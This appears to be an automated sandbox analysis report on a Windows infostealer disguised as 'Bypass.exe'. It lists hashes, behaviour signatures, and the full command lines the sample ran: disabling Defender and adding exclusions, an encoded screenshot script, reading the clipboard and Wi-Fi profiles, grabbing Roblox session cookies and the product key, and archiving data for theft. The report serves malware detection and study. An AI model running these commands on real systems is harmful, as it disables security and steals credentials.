Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-11-2024 04:46

General

  • Target

    Furk-Ultra-main/bin/Bypass.exe

  • Size

    7.3MB

  • MD5

    b6fc4bbdbae0300b3c1fd00dccbcfe78

  • SHA1

    2e14e298c29b2c79cf78a575a79f4488e85a0dd8

  • SHA256

    99935b77b6c7387bb1d572704dd96e804d0a7655e2197afeab8baacc1ad9d067

  • SHA512

    02bbacd3cd3d23f7eab4a33901eabeac6f706140e98835e916c97fb995cd747ac7c09494fcf9a90d0e92c5bc6a43123bfc32dcf88b7e1b5c713cfc7ff3ec9c15

  • SSDEEP

    196608:VuhYS6qOshoKMuIkhVastRL5Di3uq1D7mo:QYSjOshouIkPftRL54DRN

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass.exe
    "C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4516
    • C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass.exe
      "C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1184
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4636
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4228
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏  ​ .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏  ​ .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4548
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1956
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:812
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3692
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3800
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4652
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1628
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1172
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5020
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3704
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:2292
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2440
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:4060
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:432
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4836
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3660
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:3320
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4492
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2996
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3osxbbex\3osxbbex.cmdline"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:216
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA652.tmp" "c:\Users\Admin\AppData\Local\Temp\3osxbbex\CSC3AA014E1DE834044BFD24898A2EAB99.TMP"
                6⤵
                  PID:2316
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tree /A /F"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3312
            • C:\Windows\system32\tree.com
              tree /A /F
              4⤵
                PID:4472
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4728
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:3288
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:2892
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3596
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:4176
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:2936
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:1192
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            4⤵
                              PID:1628
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:4060
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:1028
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1692
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:2892
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1352
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "getmac"
                                  3⤵
                                    PID:924
                                    • C:\Windows\system32\getmac.exe
                                      getmac
                                      4⤵
                                        PID:396
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI45162\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\1pUib.zip" *"
                                      3⤵
                                        PID:1968
                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45162\rar.exe
                                          C:\Users\Admin\AppData\Local\Temp\_MEI45162\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\1pUib.zip" *
                                          4⤵
                                          • Executes dropped EXE
                                          PID:2712
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                        3⤵
                                          PID:2512
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic os get Caption
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5052
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                          3⤵
                                            PID:336
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic computersystem get totalphysicalmemory
                                              4⤵
                                                PID:2136
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              3⤵
                                                PID:4128
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  4⤵
                                                    PID:4848
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                  3⤵
                                                    PID:4332
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1032
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                    3⤵
                                                      PID:2020
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        4⤵
                                                        • Detects videocard installed
                                                        PID:1028
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                      3⤵
                                                        PID:2124
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2528
                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    1⤵
                                                      PID:3312
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                      1⤵
                                                        PID:924

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        8740e7db6a0d290c198447b1f16d5281

                                                        SHA1

                                                        ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                        SHA256

                                                        f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                        SHA512

                                                        d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        e67b7a4d382c8b1625787f0bcae42150

                                                        SHA1

                                                        cc929958276bc5efa47535055329972f119327c6

                                                        SHA256

                                                        053d0b08f22ff5121cb832d514195145a55b9a4ca26d1decd446e11b64bef89c

                                                        SHA512

                                                        3bf0311fe0c57fb9a1976fbeae6d37015736c32c59832252f3bc4c055b2a14c6bcc975dcd63b480d4f520672687a62d5ccd709a6ebdb4566bb83fb081b3f4452

